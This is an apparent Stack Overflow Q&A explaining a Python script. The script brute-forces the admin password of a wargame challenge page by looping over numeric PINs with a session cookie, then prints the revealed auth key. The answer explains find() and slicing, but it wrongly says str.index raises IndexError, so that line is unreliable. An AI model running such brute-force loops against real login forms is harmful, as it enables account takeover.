# req.text.find("") == -1?

Tags: python, brute-force

I want to know the details of the code.
Especially, why `req.text.find()` is `-1` and `req.text[index:index+30]`.

```
import requests
URL = "http://suninatas.com/challenge/web08/web08.asp"

cookie={
    "ASPSESSIONIDQSAQARDT":"MCEPDMFCFIACLLONLJHDHHAA"
} # 쿠기 값은 자신의 것으로 변경
session1 = requests.Session()

for i in range(10000):
    data1={
        'id':'admin',
        'pw':i
    }

    req = session1.post(URL, cookies=cookie, data=data1)
    if (req.text.find("Password Incorrect!") == -1):
        index = req.text.find("Authkey")
        print("\n\n")
        print(req.text[index:index+30])
        print("\n\n")
        input("Press Any KEY to exit.......")
        exit(0)

    else:
        print("Wrong Num :" + str(i))
```

Comment: did you code this, if so you should know what it does. python `find` and string slicing is easily found in documentation

Comment: Why `reg.text[index:index+30]` …? What do you want to know? Does that line result in something other than you expected? Are you wondering about the syntax?

Answer (score 0):

all right, let's look through this.

```
req = session1.post(URL, cookies=cookie, data=data1)  # Makes a POST request. req now holds the response body
if (req.text.find("Password Incorrect!") == -1):  # Look for the text "Password Incorrect!" in the text of the response body
```

So, in python, there are two ways to find the index of a particular substring in a string: `str.index(substr)` and `str.find(substr)`. In either case, if `substr` appears in `str`, then these functions return the index in `str` at which `substr` begins. The difference between them is that, if `substr` *does not appear* in `str`, then `index()` raises an `IndexError`, whereas `find()` returns -1.

Thus, when we're checking if `req.text.find("Password Incorrect!") == -1`, we're checking that the substring `"Password Incorrect!"` does not appear in `req.text`.

```
if (req.text.find("Password Incorrect!") == -1):  # continuing on...
    index = req.text.find("Authkey")              # Find the index of the string "AuthKey" in req.text
    print("\n\n")
    print(req.text[index:index+30])               # print the contents of `req.text` from that index
    print("\n\n")                                 #   through the next 30 characters
    input("Press Any KEY to exit.......")         # and finally, exit
    exit(0)
else:
    print("Wrong Num :" + str(i))                 # If we DO find "Password Incorrect!" in req.text,
                                                  #   then we just say "Wrong Number" and continue on with the loop.
```